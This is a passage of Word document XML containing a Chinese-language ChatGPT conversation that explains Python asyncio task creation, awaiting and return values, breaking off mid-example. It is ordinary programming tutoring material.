      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>个异步任务，它们被保存在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> task_list </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>列表中。然后，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">asyncio.get_event_loop() </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>获取当前的事件循环，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">loop.run_until_complete(asyncio.wait(task_list)) </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>使得所有在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> task_list </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中的异步任务并发执行。这里的关键是，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">asyncio.wait(task_list) </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>返回一个可以完成所有任务的单一的协程，并且</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> loop.run_until_complete() </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在所有任务完成之前会阻塞。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F352AA8" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="65B2627E" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在第二段代码中：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07797888" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5A11BD71" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>python</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="759D6F30" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>async def main():</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33BF8E28" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    task1 = asyncio.create_task(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56BD68F9" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        say_after(1, 'hello'))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B710D7F" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7B1F9055" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    task2 = asyncio.create_task(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04F10CDC" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        say_after(2, 'world'))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E8710B1" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0E9815B2" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    print(f"started at {time.strftime('%X')}")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B84F466" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="36A0E9BC" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    # Wait until both tasks are completed (should take around 2 seconds.)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5633B4BA" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    await task1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18A91ED6" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    await task2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B10B45C" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3AE4053D" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    print(f"finished at {time.strftime('%X')}")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58A9CA81" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="04CA8C6F" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">asyncio.create_task(coro) </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>是用来并发运行协程的。它立即启动了协程，并不需要等待它们完成。然后，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">await task1 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> await task2 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>使得</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> main </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>协程在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> task1 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> task2 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>完成前会暂停。在此期间，事件循环可以去做其他的事情（比如运行其他协程）。这与第一段代码的区别在于，我们在这里直接使用了</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> await </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>关键字来等待任务，而不是使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> loop.run_until_complete()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="697A426F" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="12537A70" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>总的来说，这两种方式都可以达到并发执行多个任务的目的，但它们的用法和适用的场景略有不同。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">asyncio.run_until_complete() </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>更适用于顶层的代码，因为它直接运行事件循环；而</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> asyncio.create_task() </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> await </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>更适用于协程内部，因为它们可以让协程在等待其他任务</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>时做其他的事情。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="278CD38F" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>User</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="609CE99E" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这里是不是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>task1 = asyncio.create_task()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>就会执行代码，但是此时</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>CPU</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可以执行第二个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>task2 = asyncio.create_task()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，两个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>IO</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>几乎同时运行，而</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>await</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>只是等待他们完成而已？</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EBB35FA" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>ChatGPT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F12A104" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="38B8178E" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>是的，你的理解是正确的。在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> Python </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> asyncio </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">asyncio.create_task(coro) </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>函数会立即启动传入的协程（也就是说，它会将这个协程提交到事件循环中去执行），然后立即返回一个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> Task </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>对象。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Task </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>对象代表了这个正在运行的协程。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="096C7B3B" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="21C03557" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>此时，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Python </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的事件循环可以同时处理多个任务。因此，当你写下</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> task1 = asyncio.create_task(coro1) </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> task2 = asyncio.create_task(coro2) </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>时，这两个协程</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> coro1 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> coro2 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>会被几乎同时提交给事件循环，并且开始并发执行。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65CB1934" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3B92CE7C" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>而</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> await </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>关键字则用于在一个协程中等待另一个协程完成。当你写下</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> await task1 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>时，当前的协程会暂停执行，等待</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> task1 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>所代表的协程完成。在此期间，事件循环可以切换到其他的协程去执行。一旦</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> task1 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>完成，事件循环会切换回来，恢复</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> await task1 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>之后的代码。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A0848C9" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7ADD0369" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>因此，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">asyncio.create_task() </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> await </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>一起使用，可以实现在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> Python </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中的并发编程，让</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> CPU </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在等待</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> IO </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>操作（比如网络请求、数据库查询）的同时，执行其他的任务。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BD8BC6C" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>User</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14C136A8" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>那如果我传入的携程函数有返回值，怎么获取</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="535A8014" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>ChatGPT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51F0702F" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="100C8AA7" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>如果你的协程函数有返回值，那么你可以在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> await </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>一个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> Task </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>时获取到这个值。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Task </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>对象在被</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> await </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>时，会返回其代表的协程的返回值。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C2FD866" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="628D8F94" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>下面是一个示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BCA0864" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="40B0C62F" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>python</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58AFDB9B" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>import asyncio</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D889DAD" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2D15E3EB" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>async def foo():</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BD581C4" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    await asyncio.sleep(1)  # </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>模拟</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> IO </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>操作</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08E01C6A" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    return 'hello'  # </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>协程的返回值</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18AECAAE" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="04A22339" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>async def main():</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B2DE30C" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
